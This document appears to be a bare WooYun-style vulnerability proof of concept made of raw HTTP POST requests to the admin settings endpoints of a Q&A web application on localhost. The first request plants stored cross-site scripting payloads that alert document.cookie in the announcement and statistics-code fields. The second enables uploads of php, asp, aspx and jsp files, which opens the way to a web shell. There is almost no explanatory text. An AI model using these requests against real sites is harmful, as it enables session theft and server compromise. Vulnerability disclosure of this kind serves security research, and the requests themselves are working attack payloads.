WooYun.org

http://127.0.0.1:8080/wenda/?/admin/setting/sys_save_ajax/

site_announce=<script>alert(document.cookie)</script>&url_rewrite_enable=N&request_route=1&request_route_custom=%2Fhome%2Fexplore%2F%3D%3D%3D%2Fexplore%2F%0A%2Fhome%2Fexplore%2Fguest%3D%3D%3D%2Fguest%0A%2Fhome%2Fexplore%2Fcategory-(%3Anum)%3D%3D%3D%2Fcategory%2F(%3Anum)%0A%2Fpeople%2Flist%2F%3D%3D%3D%2Fusers%2F%0A%2Faccount%2Flogin%2F%3D%3D%3D%2Flogin%2F%0A%2Faccount%2Flogout%2F%3D%3D%3D%2Flogout%2F%0A%2Faccount%2Fsetting%2F(%3Aany)%2F%3D%3D%3D%2Fsetting%2F(%3Aany)%2F&online_count_open=Y&online_interval=15&unread_flush_interval=100&auto_question_lock_day=30&statistic_code=%3Cscript%3Ealert(1)%3C%2Fscript%3E&report_reason=%E5%B9%BF%E5%91%8A%2FSPAM%0A%E6%81%B6%E6%84%8F%E7%81%8C%E6%B0%B4%0A%E8%BF%9D%E8%A7%84%E5%86%85%E5%AE%B9%0A%E6%96%87%E4%B8%8D%E5%AF%B9%E9%A2%98%0A%E9%87%8D%E5%A4%8D%E5%8F%91%E9%97%AE&report_message_uid=1&time_style=Y&admin_login_seccode=Y&_post_type=ajax

http://127.0.0.1:8080/wenda/?/admin/setting/type-content

quick_publish=Y&upload_enable=Y&allowed_upload_types=jpg%2Cjpeg%2Cpng%2Cgif%2Czip%2Cdoc%2Cdocx%2Crar%2Cpdf%2Cpsd%2Cphp%2Casp%2Caspx%2Cjsp&upload_size_limit=512&answer_length_lower=2&question_title_limit=100&comment_limit=0&topic_title_limit=12&upload_avatar_size_limit=512&answer_edit_time=30&uninterested_fold=5&best_answer_day=30&best_answer_min_count=3&best_agree_min_count=3&related_question_keyword_count=&_post_type=ajax

allowed_upload_types=jpg%2Cjpeg%2Cpng%2Cgif%2Czip%2Cdoc%2Cdocx%2Crar%2Cpdf%2Cpsd%2Cphp%2Casp%2Caspx%2Cjsp